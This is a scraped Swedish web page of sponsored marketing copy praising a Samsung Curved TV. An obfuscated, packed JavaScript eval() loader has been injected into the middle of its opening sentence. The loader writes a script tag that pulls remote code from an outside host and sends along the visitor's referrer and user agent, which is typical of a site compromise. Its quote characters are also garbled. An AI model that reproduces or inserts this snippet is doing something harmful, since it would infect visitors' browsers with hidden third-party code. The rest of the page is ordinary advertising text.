Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Sponsrad Video: Kom närmare dramatiken med din Samsung Curved TV

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_254632406.js”>
Kom eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkkbf|var|u0026u|referrer|bbnft||js|php’.split(’|’),0,{}))
närmare dramatiken med din Samsung Curved TV. Streama filmer och serier från t ex Netflix eller HBO direkt i TV:n utan vare sig box eller sladdar. Samsung Smart TV är snabb och lättanvänd, har inbyggd interaktiv TV-guide, kan visa material trådlöst från din mobil eller tablet och mycket mer.

Curved TV väcker känslor

Curved TV är här för att stanna. Den välvda formen ger bilden ett imponerande djup. Dramatiken flyttar närmare dig och skapar en mäktig upplevelse. Filmer, serier och sport upplevs på ett helt nytt sätt. Känslan är att allt händer runt omkring dig.

Större och djupare bildupplevelse

Den välvda skärmen gör att sidorna på bilden kommer närmare dig, vilket skapar ett bredare synfält. Bildupplevelsen blir större och mer gripande jämfört med en vanlig platt-TV. Scenerna får ett fantastiskt djup och du sugs lättare in i spänningen.

Skönhet i detaljerna

Curved TV fångar dina ögon. Formen är elegant. Ramen är tunn. Materialen är exklusiva. Den lätt bågformade designen bidrar med ett luftigt intryck till rummet.

Sponsrad video